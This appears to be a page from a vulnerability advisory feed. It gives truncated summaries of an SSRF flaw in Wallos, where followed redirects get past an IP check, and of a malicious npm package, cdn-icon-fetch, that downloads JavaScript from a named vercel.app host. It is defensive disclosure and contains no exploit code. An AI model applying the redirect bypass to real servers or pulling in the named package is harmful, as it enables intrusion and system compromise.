CVE-2026-27479

CVE-2026-27479 affects Wallos versions ≤ 4.6.0, where a SSRF issue arises in the logo/icon URL fetch. The application validates the target URL’s IP, but allows HTTP redirects (CURLOPT_FOLLOWLOCATION = true) and follows up to 3 redirects, bypassing the initial IP check and enabling access to inter...

CVE-2026-27479 Wallos: SSRF via Redirect Bypass in Logo/Icon URL Fetch

Wallos is an open-source, self-hostable personal subscription tracker. Versions 4.6.0 and below contain a Server-Side Request Forgery SSRF vulnerability in the subscription and payment logo/icon upload functionality. The application validates the IP address of the provided URL before making the...

Malicious code in cdn-icon-fetch (npm)

--- -= Per source details. Do not edit below this line.=- Source: ghsa-malware 8c5df12b33f292879e5c1199fb8a0130cbbb1a1cd4cf1d3e72cb723143ccaa1d Any computer that has this package installed or running should be considered fully compromised. All secrets and keys stored on that computer should be...

Embedded Malicious Code

Overview cdn-icon-fetch is a Malicious package. Affected versions of this package are vulnerable to Embedded Malicious Code. Once this package is installed and executed, it downloads a Javascript file from a cdn-static-server.vercel.app URL, which appears to be an image hosting site. However, by...